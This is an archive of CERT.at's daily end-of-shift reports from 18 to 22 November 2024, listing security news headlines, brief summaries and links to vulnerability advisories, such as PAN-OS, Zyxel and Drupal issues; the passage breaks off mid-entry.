- Daily - CERT.at

Tageszusammenfassung - 22.11.2024
by Daily end-of-shift report 22 Nov '24

22 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 21-11-2024 18:00 − Freitag 22-11-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Ransomgroup Helldown: Attacks on Zyxel Devices ∗∗∗ --------------------------------------------- SEC Consult has observed a rise of attacks on Zyxel firewalls over the past two months affecting Zyxel ATP firewall (version 5.38 and above - i.e. we have seen successful attacks also on fully patched Zyxel ATP version 5.39 firewalls). [..] We write this blogpost to highlight the need to remain vigilant and monitor activity on the Zyxel Firewalls, especially since there seems to be no official patch from the vendor as of the time of this blog post. --------------------------------------------- https://sec-consult.com/blog/detail/ransomgroup-helldown-attacks-on-zyxel-d… ∗∗∗ Angriffe auf Citrix-Sicherheitslücke beobachtet ∗∗∗ --------------------------------------------- In der vergangenen Woche hat Citrix Sicherheitslücken im Session Recording geschlossen. Nun haben IT-Forscher Angriffe darauf beobachtet. --------------------------------------------- https://www.heise.de/-10100614 ∗∗∗ Fintech Giant Finastra Investigating Data Breach ∗∗∗ --------------------------------------------- Finastra, which provides software and services to 45 of the worlds top 50 banks, notified customers of the security incident after a cybercriminal began selling more than 400 gigabytes of data purportedly stolen from the company. --------------------------------------------- https://it.slashdot.org/story/24/11/21/2043251/fintech-giant-finastra-inves… ∗∗∗ Heres what happens if you dont layer network security – or remove unused web shells ∗∗∗ --------------------------------------------- The US Cybersecurity and Infrastructure Agency often breaks into critical organizations' networks – with their permission, of course – to simulate real-world cyber attacks and thereby help improve their security. [..] In a Thursday blog post, the Agency (CISA) detailed the exercise and opined they "illuminate lessons learned for network defenders and software manufacturers about how to respond to and reduce risk." In other words: give it a read and learn from this critical infrastructure organization's mistakes – and the things it did well – to keep real criminals out of your IT environment. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2024/11/22/cisa_red_tea… ∗∗∗ Lateral Movement on macOS: Unique and Popular Techniques and In-the-Wild Examples ∗∗∗ --------------------------------------------- We uncover macOS lateral movement tactics, such as SSH key misuse and AppleScript exploitation. Strategies to counter this attack trend are also discussed. --------------------------------------------- https://unit42.paloaltonetworks.com/unique-popular-techniques-lateral-movem… ∗∗∗ UK drinking water supplies disrupted by record number of undisclosed cyber incidents ∗∗∗ --------------------------------------------- A record number of cyber incidents impacted Britain’s critical drinking water supplies this year without being publicly disclosed, according to information obtained by Recorded Future News. --------------------------------------------- https://therecord.media/uk-drinking-water-infrastructure-cyber-incident-rep… ∗∗∗ A Bag of RATs: VenomRAT vs. AsyncRAT ∗∗∗ --------------------------------------------- Remote access tools (RATs) have long been a favorite tool for cyber attackers, since they enable remote control over compromised systems and facilitate data theft, espionage, and continuous monitoring of victims. Among the well-known RATs are VenomRAT and AsyncRAT. [..] This comparison explores the core technical differences between VenomRAT and AsyncRAT by analyzing their architecture, capabilities, and tactics. --------------------------------------------- https://www.rapid7.com/blog/post/2024/11/21/a-bag-of-rats-venomrat-vs-async… ∗∗∗ Looking at the Attack Surfaces of the Kenwood DMX958XR IVI ∗∗∗ --------------------------------------------- In our previous Kenwood DMX958XR blog post, we detailed the internals of the Kenwood in-vehicle infotainment (IVI) head unit and provided annotated pictures of each PCB. In this post, we aim to outline the attack surface of the DMX958XR in the hopes of providing inspiration for vulnerability research. --------------------------------------------- https://www.thezdi.com/blog/2024/11/20/looking-at-the-attack-surfaces-of-th… ===================== = Vulnerabilities = ===================== ∗∗∗ QNAP Security Advisories 2024-11-23 ∗∗∗ --------------------------------------------- QNAP released 8 security advisories: 5x important, 3x moderate --------------------------------------------- https://www.qnap.com/en-us/security-advisories ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (postgresql-13, postgresql-15, and webkit2gtk), Fedora (libsndfile, microcode_ctl, and trafficserver), Mageia (kanboard, kernel, kmod-xtables-addons, kmod-virtualbox, and bluez, kernel-linus, opendmarc, and radare2), Oracle (.NET 9.0, bubblewrap and flatpak, buildah, expat, firefox, grafana, grafana-pcp, kernel, krb5, libsoup, libvpx, NetworkManager-libreswan, openexr, pcp, python3.11, python3.11-urllib3, python3.12, python3.9, squid, thunderbird, tigervnc, and webkit2gtk3), Red Hat (.NET 9.0, binutils, expat, grafana-pcp, kernel, libsoup, NetworkManager-libreswan, openexr, python3.11, python3.12, python39:3.9, squid, tigervnc, and webkit2gtk3), SUSE (chromedriver, cobbler, govulncheck-vulndb, and icinga2), and Ubuntu (linux-lowlatency, linux-lowlatency-hwe-6.8, python2.7, and zbar). --------------------------------------------- https://lwn.net/Articles/999102/ ∗∗∗ ZDI-24-1605: Adobe InDesign JP2 File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1605/ ∗∗∗ ZDI-24-1606: 7-Zip CopyCoder Infinite Loop Denial-of-Service Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1606/ ∗∗∗ ZDI-24-1613: Intel Driver & Support Assistant Log Folder Link Following Local Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1613/ ∗∗∗ SSA-354569 V1.0: Multiple Vulnerabilities in Palo Alto Networks Virtual NGFW on RUGGEDCOM APE1808 Devices ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/html/ssa-354569.html ∗∗∗ NVIDIA affected by a Critical vulnerability CVE-2024-0138 ∗∗∗ --------------------------------------------- https://thecyberthrone.in/2024/11/22/nvidia-affected-by-a-critical-vulnerab… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 21.11.2024
by Daily end-of-shift report 21 Nov '24

21 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 20-11-2024 18:00 − Donnerstag 21-11-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Fortinet VPN design flaw hides successful brute-force attacks ∗∗∗ --------------------------------------------- A design flaw in the Fortinet VPN servers logging mechanism can be leveraged to conceal the successful verification of credentials during a brute-force attack without tipping off defenders of compromised logins. --------------------------------------------- https://www.bleepingcomputer.com/news/security/fortinet-vpn-design-flaw-hid… ∗∗∗ Wegen Sicherheitslücke: D-Link drängt auf Entsorgung älterer Router ∗∗∗ --------------------------------------------- Mehrere D-Link-Router, von denen einige erst vor wenigen Monaten den EOL-Status erreicht haben, sind angreifbar. Patches gibt es nicht. --------------------------------------------- https://www.golem.de/news/wegen-sicherheitsluecke-d-link-draengt-auf-entsor… ∗∗∗ Lumma Stealer on the Rise: How Telegram Channels Are Fueling Malware Proliferation ∗∗∗ --------------------------------------------- Authored by: M. Authored by: M, Mohanasundaram and Neil Tyagi In today’s rapidly evolving cyber landscape, malware threats .. --------------------------------------------- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lumma-stealer-on-the-r… ∗∗∗ Azure Key Vault Tradecraft with BARK ∗∗∗ --------------------------------------------- This post details the existing and new functions in BARK that support adversarial tradecraft research relevant to the Azure Key Vault service. The latter part of the post shows an example of how a red team operator may use these commands during the course of an assessment. --------------------------------------------- https://posts.specterops.io/azure-key-vault-tradecraft-with-bark-24163abc8d… ∗∗∗ “Free Hugs” – What to be Wary of in Hugging Face – Part 2 ∗∗∗ --------------------------------------------- Enjoy Threat Modeling? Try Threats in Models! Previously… In part 1 of this 4-part blog, we discussed Hugging Face, the potentially dangerous trust relationship between Hugging Face users and the ReadMe file, exploiting users who .. --------------------------------------------- https://checkmarx.com/blog/free-hugs-what-to-be-wary-of-in-hugging-face-par… ∗∗∗ New Report Reveals Hidden Risks: How Internet-Exposed Systems Threaten Critical Infrastructure ∗∗∗ --------------------------------------------- A new Censys report found 145,000 exposed ICSs and thousands of insecure human-machine interfaces (HMIs), providing attackers with an accessible path to disrupt critical operations. Real-world examples underscore the danger, with Iranian and Russian-backed hackers exploiting HMIs to manipulate water systems in Pennsylvania and Texas. GreyNoise research .. --------------------------------------------- https://www.greynoise.io/blog/new-report-reveals-hidden-risks-how-internet-… ∗∗∗ Finding Bugs in Chrome with CodeQL ∗∗∗ --------------------------------------------- This blog post discusses how to use a static analysis tool called CodeQL to search for vulnerabilities in Chrome. --------------------------------------------- https://bughunters.google.com/blog/5085111480877056/finding-bugs-in-chrome-… ∗∗∗ Spelunking in Comments and Documentation for Security Footguns ∗∗∗ --------------------------------------------- Join us as we explore seemingly safe but deceptively tricky ground in Elixir, Python, and the Golang standard library. We cover officially documented, or at least previously discussed, code functionality that could unexpectedly introduce vulnerabilities. Well-documented behavior is not always what it appears! --------------------------------------------- https://blog.includesecurity.com/2024/11/spelunking-in-comments-and-documen… ∗∗∗ Azure Detection Engineering: Log idiosyncrasies you should know about ∗∗∗ --------------------------------------------- We share a few inconsistencies found in Azure logs which make detection engineering more challenging. --------------------------------------------- https://tracebit.com/blog/azure-detection-engineering-log-idiosyncrasies-yo… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (kernel, NetworkManager-libreswan, and openssl), Fedora (chromium and llvm-test-suite), Mageia (thunderbird), and Ubuntu (linux-aws-6.8, linux-azure, linux-azure-6.8, linux-oracle-6.8,, linux-azure, and ruby2.7). --------------------------------------------- https://lwn.net/Articles/998949/ ∗∗∗ Progress Kemp LoadMaster OS Command Injection Vulnerability ∗∗∗ --------------------------------------------- FortiGuard network sensors detect attack attempts targeting the Progress Kemp LoadMaster. Successful exploitation of the CVE-2024-1212 vulnerability allows unauthenticated remote attackers to access the system through the management interface, potentially leading to data breaches, service disruptions, or further attacks --------------------------------------------- https://fortiguard.fortinet.com/outbreak-alert/kemp-loadmaster-os-command-i… ∗∗∗ ZDI-24-1532: 7-Zip Zstandard Decompression Integer Underflow Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1532/ ∗∗∗ Drupal core - Moderately critical - Gadget chain - SA-CORE-2024-008 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-core-2024-008 ∗∗∗ Drupal core - Moderately critical - Gadget chain - SA-CORE-2024-007 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-core-2024-007 ∗∗∗ Drupal core - Critical - Cross Site Scripting - SA-CORE-2024-005 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-core-2024-005 ∗∗∗ Drupal core - Moderately critical - Access bypass - SA-CORE-2024-004 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-core-2024-004 ∗∗∗ Drupal core - Moderately critical - Cross Site Scripting - SA-CORE-2024-003 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-core-2024-003 ∗∗∗ Drupal core - Moderately critical - Cross Site Scripting - SA-CORE-2024-003 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-core-2024-003 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 20.11.2024
by Daily end-of-shift report 20 Nov '24

20 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 19-11-2024 18:00 − Mittwoch 20-11-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Bigger and badder: how DDoS attack sizes have evolved over the last decade ∗∗∗ --------------------------------------------- If we plot the metrics associated with large DDoS attacks observed in the last 10 years, does it show a straight, steady increase in an exponential curve that keeps becoming steeper, or is it closer to a linear growth? Our analysis found the growth is not linear but rather is exponential, with the slope varying depending on the metric (rps, pps or bps). --------------------------------------------- https://blog.cloudflare.com/bigger-and-badder-how-ddos-attack-sizes-have-ev… ∗∗∗ Kein Angriff auf Idev-Portal: Destatis weist Schuld für Datenleck von sich ∗∗∗ --------------------------------------------- Das Statistische Bundesamt hat sein Idev-Portal untersucht. Von Hackern erbeutete Daten sollen bei den meldenden Unternehmen abgeflossen sein. --------------------------------------------- https://www.golem.de/news/kein-cyberangriff-auf-meldesystem-destatis-weist-… ∗∗∗ Inside the Threat: Ein Blick hinter die Kulissen zur Abwehr einer aktiven Bedrohung ∗∗∗ --------------------------------------------- Früherkennung und proaktive Untersuchung können einen Ransomware-Angriff im Keim ersticken. Ein aktueller realer Fall, zeigt, wie es funktioniert. --------------------------------------------- https://sec-consult.com/de/blog/detail/inside-the-threat-ein-blick-hinter-d… ∗∗∗ Decades-Old Security Vulnerabilities Found in Ubuntus Needrestart Package ∗∗∗ --------------------------------------------- Multiple decade-old security vulnerabilities have been disclosed in the needrestart package installed by default in Ubuntu Server (since version 21.04) that could allow a local attacker to gain root privileges without requiring user .. --------------------------------------------- https://thehackernews.com/2024/11/decades-old-security-vulnerabilities.html ∗∗∗ Yubikey-Seitenkanal: Weitere Produkte für Cloning-Attacke anfällig ∗∗∗ --------------------------------------------- Die Seitenkanal-Lücke EUCLEAK wurde auch als "Yubikey-Cloning-Attacke" bekannt. Das BSI re-zertifiziert aktualisierte Produkte, die betroffen waren. --------------------------------------------- https://www.heise.de/news/EUCLEAK-Weitere-Produkte-fuer-Cloning-Attacke-anf… ∗∗∗ Threat Assessment: Ignoble Scorpius, Distributors of BlackSuit Ransomware ∗∗∗ --------------------------------------------- Explore this assessment on cybercrime group Ignoble Scorpius, distributors of BlackSuit ransomware. Since May 2023, operations have increased —affecting critical sectors. --------------------------------------------- https://unit42.paloaltonetworks.com/threat-assessment-blacksuit-ransomware-… ∗∗∗ Looking at the Internals of the Kenwood DMX958XR IVI ∗∗∗ --------------------------------------------- For the upcoming Pwn2Own Automotive contest, a total of four in-vehicle infotainment (IVI) head units have been selected as targets. One of these is the double DIN Kenwood DMX958XR. This unit offers a variety of .. --------------------------------------------- https://www.thezdi.com/blog/2024/11/18/looking-at-the-internals-of-the-kenw… ∗∗∗ Critical Vulnerabilities in vCenter Server Exploited in the Wild ∗∗∗ --------------------------------------------- CVE CVE-2024-38813CVE-2024-38812 Affected Products VMware vCenter Server VMware Cloud Foundation Exploitation Broadcom has confirmed exploitation of these vulnerabilities[1]. The CVE has not been .. --------------------------------------------- https://www.truesec.com/hub/blog/critical-vulnerabilities-in-vcenter-server… ∗∗∗ Malicious QR Codes: How big of a problem is it, really? ∗∗∗ --------------------------------------------- QR codes are disproportionately effective at bypassing most anti-spam filters. Talos discovered two effective methods for defanging malicious QR codes, a necessary step to make them safe for consumption. --------------------------------------------- https://blog.talosintelligence.com/malicious_qr_codes/ ∗∗∗ Hackers Exploit Misconfigured Jupyter Servers for Illegal Sports Streaming ∗∗∗ --------------------------------------------- Aqua Nautilus’ research reveals hackers are leveraging vulnerable and misconfigured Jupyter Notebook servers to steal live sports streams. --------------------------------------------- https://hackread.com/hackers-exploit-misconfigured-jupyter-servers-sports-s… ∗∗∗ Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 ∗∗∗ --------------------------------------------- It'll be no surprise that 2024, 2023, 2022, and every other year of humanities existence has been tough for SSLVPN appliances. Anyhow, there are new vulnerabilities (well, two of them) that are being exploited in the Palo Alto Networks .. --------------------------------------------- https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve… ∗∗∗ Defending Your Directory: An Expert Guide to Mitigating Pass-the-Hash Attacks in Active Directory ∗∗∗ --------------------------------------------- In our latest technical blog series, our DFIR team are highlighting the most prominent Active Directory (AD) threats, describing the tell-tale signs that your AD might be at risk, and give experienced insight into the best prevention and mitigation strategies to shore up your AD security and bolster your digital identity protection. --------------------------------------------- https://www.nccgroup.com/us/research-blog/defending-your-directory-an-exper… ∗∗∗ Let’s Encrypt: Ten Years ∗∗∗ --------------------------------------------- Vital personal and business information flows over the Internet more frequently than ever, and we don’t always know when it’s happening. It’s clear at this point that encrypting is something all of us should be doing. Then why don’t we use TLS (the successor to SSL) everywhere? Every browser in every device supports it. Every server in every data center supports it. Why don’t we just flip the switch? --------------------------------------------- https://letsencrypt.org/2014/11/18/announcing-lets-encrypt/ ∗∗∗ Achieving NIST CSF 2.0 Compliance: Best Practices ∗∗∗ --------------------------------------------- Cybersecurity is an ever-growing concern in today’s digital era. With the rise of cyberattacks and data breaches, organizations must adopt best practices to safeguard their sensitive information. One of the leading frameworks guiding organizations in securing their digital assets is the NIST CSF 2.0 by National Institute of Standards and .. --------------------------------------------- https://fortbridge.co.uk/regulations/achieving-nist-csf-2-0-compliance-with… ===================== = Vulnerabilities = ===================== ∗∗∗ DSA-5815-1 needrestart - security update ∗∗∗ --------------------------------------------- https://lists.debian.org/debian-security-announce/2024/msg00229.html -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 19.11.2024
by Daily end-of-shift report 19 Nov '24

19 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Montag 18-11-2024 18:00 − Dienstag 19-11-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Spotify abused to promote pirated software and game cheats ∗∗∗ --------------------------------------------- Spotify playlists and podcasts are being abused to push pirated software, game cheat codes, spam links, and "warez" sites. By injecting targeted keywords and links in playlist names and podcast descriptions, threat actors may .. --------------------------------------------- https://www.bleepingcomputer.com/news/security/spotify-abused-to-promote-pi… ∗∗∗ New Helldown Ransomware Variant Expands Attacks to VMware and Linux Systems ∗∗∗ --------------------------------------------- Cybersecurity researchers have shed light on a Linux variant of a relatively new ransomware strain called Helldown, suggesting that the threat actors are broadening their attack focus."Helldown deploys Windows ransomware derived from the LockBit 3.0 code," Sekoia .. --------------------------------------------- https://thehackernews.com/2024/11/new-helldown-ransomware-expands-attacks.h… ∗∗∗ Critical 9.8-rated VMware vCenter RCE bug exploited after patch fumble ∗∗∗ --------------------------------------------- If you didnt fix this a month ago, your to-do list probably needs a reshuffle Two VMware vCenter server bugs, including a critical heap-overflow vulnerability that leads to remote code execution (RCE), have been exploited in attacks after Broadcom’s first attempt to fix the flaws fell short. --------------------------------------------- https://www.theregister.com/2024/11/18/vmware_vcenter_rce_exploited/ ∗∗∗ Veritas Enterprise Vault: Kritische Codeschmuggel-Lücken in Archivsoftware ∗∗∗ --------------------------------------------- In Vertias Enterprise Vault können Angreifer kritische Lücke zum Einschleusen von Schadcode missbrauchen. --------------------------------------------- https://www.heise.de/news/Veritas-Enterprise-Vault-Kritische-Codeschmuggel-… ∗∗∗ Kritische Palo-Alto-Lücke: Details und Patches sind da, CISA warnt vor Exploit ∗∗∗ --------------------------------------------- Fast drei Wochen nach ersten Exploit-Gerüchten hat der Hersteller nun endlich reagiert, trickst aber. Derweil warnt die US-Cyberbehörde vor Angriffen. --------------------------------------------- https://www.heise.de/news/Kritische-Palo-Alto-Luecke-Patches-sind-da-CISA-w… ∗∗∗ FreeBSD Foundation releases Bhyve and Capsicum security audit ∗∗∗ --------------------------------------------- The FreeBSD Foundation has announced the release of a security audit report conducted by security firm Synacktiv. The audit uncovered a number of vulnerabilities: Most of these vulnerabilities have been addressed through official FreeBSD Project security advisories, which offer detailed information about each vulnerability, its impact, and the measures .. --------------------------------------------- https://lwn.net/Articles/998615/ ∗∗∗ FrostyGoop’s Zoom-In: A Closer Look into the Malware Artifacts, Behaviors and Network Communications ∗∗∗ --------------------------------------------- We analyze FrostyGoop malware, which targets OT systems. This article walks through newly discovered samples, indicators, and also examines configurations and network communications. --------------------------------------------- https://unit42.paloaltonetworks.com/frostygoop-malware-analysis/ ∗∗∗ The Importance of Establishing a Solid Third Party Risk Management Framework for Risk Mitigation ∗∗∗ --------------------------------------------- In the previous post, we introduced the concept of Third-Party Risk Management (TPRM) and its importance in today’s interconnected world. Now, let us have a look at the practical aspects of building a solid TPRM program and why it is important for your company. 1. Start with a Third-Party Inventory The first step in building .. --------------------------------------------- https://blog.nviso.eu/2024/11/19/the-importance-of-establishing-a-solid-thi… ∗∗∗ Facebook Malvertising Campaign Spreads Malware via Fake Bitwarden ∗∗∗ --------------------------------------------- A Facebook malvertising campaign disguised as Bitwarden updates spreads malware, targeting business accounts. Users are tricked .. --------------------------------------------- https://hackread.com/facebook-malvertising-malware-via-fake-bitwarden/ ∗∗∗ Threat Actors Hijack Misconfigured Servers for Live Sports Streaming ∗∗∗ --------------------------------------------- To keep up with the ever-evolving world of cybersecurity, Aqua Nautilus researchers deploy honeypots that mimic real-world development environments. During a recent threat-hunting operation, they uncovered a surprising new .. --------------------------------------------- https://blog.aquasec.com/threat-actors-hijack-misconfigured-servers-for-liv… ∗∗∗ Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 ∗∗∗ --------------------------------------------- Note: Since this is breaking news and more details are being released, were updating this .. --------------------------------------------- https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve… ∗∗∗ NVD Backlog Tops 20,000 CVEs Awaiting Analysis as NIST Prepares System Updates ∗∗∗ --------------------------------------------- CVEs awaiting analysis by the NVD have broken the 20,000 mark, after the security community noticed its enrichment activity slowed to nearly a halt again last week. NIST failed to meet its self-imposed deadline of .. --------------------------------------------- https://socket.dev/blog/nvd-backlog-tops-20-000-cves ∗∗∗ Threat Actor Exposes Playbook for Exploiting npm to Build Blockchain-Powered Botnets ∗∗∗ --------------------------------------------- In October 2024, Socket discovered a widespread npm malware campaign using Ethereum smart contracts to evade detection and maintain control over infected systems. Building on our initial research and equipped with analyses of the .. --------------------------------------------- https://socket.dev/blog/exploiting-npm-to-build-a-blockchain-powered-botnet ∗∗∗ Extending Burp Suite for fun and profit – The Montoya way – Part 7 ∗∗∗ --------------------------------------------- Last time we saw how to develop an extension that will add custom active and passive checks to the Burp Scanner. Today we will modify that extension to detect serialization issues using .. --------------------------------------------- https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-t… ∗∗∗ U.S. Extradites and Charges Alleged Phobos Ransomware Admin ∗∗∗ --------------------------------------------- The United States secured the extradition of a Russian national from South Korea who is allegedly the mastermind behind the notorious Phobos ransomware. Evgenii Ptitsyn, 42, is accused of administering the Phobos .. --------------------------------------------- https://thecyberexpress.com/us-charges-alleged-phobos-ransomware-admin/ ===================== = Vulnerabilities = ===================== ∗∗∗ ZDI-24-1516: Trend Micro Deep Security Agent Manual Scan Command Injection Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trend Micro Deep Security Agent. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-51503. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1516/ ∗∗∗ ZDI-24-1517: McAfee Total Protection Uncontrolled Search Path Element Local Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- This vulnerability allows local attackers to escalate privileges on affected installations of McAfee Total Protection. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.7. The following CVEs are assigned: CVE-2024-49592. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1517/ ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (.NET 9.0, bcc, bluez, bpftrace, bubblewrap, flatpak, buildah, cockpit, containernetworking-plugins, cups, cyrus-imapd, edk2, expat, firefox, fontforge, gnome-shell, gnome-shell-extensions, grafana, grafana-pcp, gtk3, httpd, iperf3, jose, krb5, libgcrypt, libsoup, libvirt, libvpx, lldpd, microcode_ctl, .. --------------------------------------------- https://lwn.net/Articles/998755/ ∗∗∗ Oracle Security Alert for CVE-2024-21287 - 18 November 2024 ∗∗∗ --------------------------------------------- https://www.oracle.com/security-alerts/alert-cve-2024-21287.html -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 18.11.2024
by Daily end-of-shift report 18 Nov '24

18 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 15-11-2024 18:00 − Montag 18-11-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Honeypot: Forscher veralbert Scriptkiddies mit Fake-Ransomware ∗∗∗ --------------------------------------------- Ein Tool namens Jinn sollte Ransomware-Angriffe vereinfachen. Tatsächlich war das ein Honeypot, auf den so einige Akteure reingefallen sind. --------------------------------------------- https://www.golem.de/news/honeypot-forscher-veralbert-scriptkiddies-mit-fak… ∗∗∗ Women In Russian-Speaking Cybercrime: Mythical Creatures or Significant Members of Underground? ∗∗∗ --------------------------------------------- A blog detailing in-depth research into women in Russian-speaking cybercrime. --------------------------------------------- https://www.sans.org/blog/women-in-russian-speaking-cybercrime-mythical-cre… ∗∗∗ DORA-Kernthemen meistern: Ein Deep Dive in Incident Management ∗∗∗ --------------------------------------------- In diesem Blogbeitrag befassen wir uns mit den Anforderungen an DORA Incident Management. --------------------------------------------- https://sec-consult.com/de/blog/detail/dora-kernthemen-meistern-ein-deep-di… ∗∗∗ Swiss cheesed off as postal service used to spread malware ∗∗∗ --------------------------------------------- QR codes arrive via an age-old delivery system Switzerlands National Cyber Security Centre (NCSC) has issued an alert about malware being spread via the countrys postal service. --------------------------------------------- https://www.theregister.com/2024/11/16/swiss_malware_qr/ ∗∗∗ WTF: Sicherheitsforscher finden beim Nachstellen einer Lücke drei neue ∗∗∗ --------------------------------------------- Als die Watchtowr Labs-Forscher die Lücke im FortiManager nachprüfen wollten, fanden sie weitere Fehler und unvollständige Fixes. --------------------------------------------- https://www.heise.de/news/Sicherheitsforscher-finden-beim-Nachstellen-einer… ∗∗∗ T-Mobile von chinesischem Cyberangriff betroffen ∗∗∗ --------------------------------------------- Laut einem Bericht konnten die Hacker in mehrere Telekommunikationsunternehmen in den USA wie auch international eindringen --------------------------------------------- https://www.derstandard.at/story/3000000245232/t-mobile-von-chinesischem-cy… ∗∗∗ Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 ∗∗∗ --------------------------------------------- We detail the observed limited activity regarding authentication bypass vulnerability CVE-2024-0012 affecting specific versions of PAN-OS software, and include protections and mitigations. --------------------------------------------- https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/ ∗∗∗ Akute Welle an DDoS-Angriffen gegen österreichische Unternehmen und Organisationen ∗∗∗ --------------------------------------------- Seit heute Früh sind verschiedene österreichische Unternehmen und Organisationen aus unterschiedlichen Branchen und Sektoren mit DDoS-Angriffen konfrontiert. Die genauen Hintergründe der Attacke sind uns zurzeit nicht bekannt, Hinweise für eine hacktivistische Motivation liegen jedoch vor. In Anbetracht der aktuellen Geschehnisse .. --------------------------------------------- https://www.cert.at/de/aktuelles/2024/11/ddos-angriffe-november-2024 ∗∗∗ BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA ∗∗∗ --------------------------------------------- KEY TAKEAWAYS Volexity discovered and reported a vulnerability in Fortinets Windows VPN client, FortiClient, where user credentials remain in process memory after a user authenticates to the VPN. This vulnerability was abused by BrazenBamboo in their DEEPDATA malware. BrazenBamboo is the threat actor behind development of the .. --------------------------------------------- https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlien… ∗∗∗ Inside Water Barghest’s Rapid Exploit-to-Market Strategy for IoT Devices ∗∗∗ --------------------------------------------- In this blog entry, we discuss Water Barghests exploitation of IoT devices, transforming them into profitable assets through advanced automation and monetization techniques. --------------------------------------------- https://www.trendmicro.com/en_us/research/24/k/water-barghest.html ∗∗∗ What To Use Instead of PGP ∗∗∗ --------------------------------------------- It’s been more than five years since The PGP Problem was published, and I still hear from people who believe that using PGP (whether GnuPG or another OpenPGP implementation) is a thing .. --------------------------------------------- https://soatok.blog/2024/11/15/what-to-use-instead-of-pgp/ ∗∗∗ TPM-Backed SSH Keys on Windows 11 ∗∗∗ --------------------------------------------- On my MacBook, I’ve been using using TPM/security key-based SSH keys for years since it’s where I do the most development and the software support is good. Secretive is a decent app I can vouch for. Before that, I was .. --------------------------------------------- https://cedwards.xyz/tpm-backed-ssh-keys-on-windows-11/ ∗∗∗ Reverse Engineering iOS 18 Inactivity Reboot ∗∗∗ --------------------------------------------- iOS 18 introduced a new inactivity reboot security feature. What does it protect from and how does it work? This blog post covers all the details down to a kernel extension and the Secure Enclave Processor. --------------------------------------------- https://naehrdine.blogspot.com/2024/11/reverse-engineering-ios-18-inactivit… ∗∗∗ Malicious npm Package Exploits WhatsApp Authentication with Remote Kill Switch for File Destruction ∗∗∗ --------------------------------------------- A malicious npm package disguised as a WhatsApp client is exploiting authentication flows with a remote kill switch to exfiltrate data and destroy files. --------------------------------------------- https://socket.dev/blog/malicious-npm-package-exploits-whatsapp-authenticat… ∗∗∗ Redis CVE-2024-31449: How to Reproduce and Mitigate the Vulnerability ∗∗∗ --------------------------------------------- On October 7, 2024, information about a serious vulnerability in Redis, identified as CVE-2024-31449, was published. This vulnerability allows an authenticated user to execute remote code using specially .. --------------------------------------------- https://redrays.io/blog/redis-cve-2024-31449-how-to-reproduce-and-mitigate-… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (binutils, libsoup, squid:4, tigervnc, and webkit2gtk3), Debian (icinga2, postgresql-13, postgresql-15, smarty3, symfony, thunderbird, and waitress), Fedora (dotnet9.0, ghostscript, microcode_ctl, php-bartlett-PHP-CompatInfo, python-waitress, and webkitgtk), Gentoo (Perl, Pillow, and X.Org X server, XWayland), .. --------------------------------------------- https://lwn.net/Articles/998570/ ∗∗∗ CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface 